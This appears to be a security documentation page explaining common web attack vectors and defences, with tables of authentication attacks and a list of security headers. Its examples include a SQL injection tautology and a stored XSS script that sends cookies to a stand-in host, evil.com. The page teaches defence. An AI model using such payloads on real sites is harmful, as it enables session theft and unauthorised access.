Skip to main content

Attack Vectors

An attack vector is a path or method that a malicious actor uses to gain unauthorised access to a system, network, or application. Understanding common attack vectors is essential for building secure software.

Common Web Application Attack Vectors

Injection Attacks

SQL Injection

Malicious SQL inserted into queries:

-- Vulnerable query
SELECT * FROM users WHERE email = 'user@example.com' OR '1'='1'

-- Prevention: Use parameterized queries
SELECT * FROM users WHERE email = $1

Cross-Site Scripting (XSS)

Malicious scripts injected into web pages:

<!-- Stored XSS example -->
<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>

<!-- Prevention: Escape output, use CSP headers -->

Authentication Attacks

AttackDescriptionMitigation
Brute forceTrying many passwordsRate limiting, lockouts
Credential stuffingUsing leaked credentialsMFA, breach detection
Session hijackingStealing session tokensSecure cookies, HTTPS
PhishingFake login pagesUser education, MFA

API-Specific Vectors

  • Broken authentication: Weak token validation
  • Excessive data exposure: Returning more data than needed
  • Lack of rate limiting: Enables abuse
  • Mass assignment: Accepting unintended parameters
  • SSRF: Server-side request forgery

Infrastructure Attack Vectors

  • Unpatched software: Known vulnerabilities exploited
  • Misconfigured services: Open ports, default credentials
  • Supply chain: Compromised dependencies
  • Social engineering: Tricking humans, not systems

Defense Strategies

Defense in Depth

Multiple layers of security:

WAF → Load Balancer → Application → Database
     ↓              ↓             ↓
   Block attacks   Auth checks   Encrypted data

Security Headers

Content-Security-Policy: default-src 'self'
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000

What We Recommend

  1. Use frameworks: Modern frameworks prevent common vulnerabilities
  2. Keep dependencies updated: Automated vulnerability scanning
  3. Enable WAF: Block known attack patterns
  4. Implement authentication properly: Use proven libraries
  5. Regular security audits: Penetration testing, code review
  6. Encrypt everything: SSL/TLS for transit, encryption at rest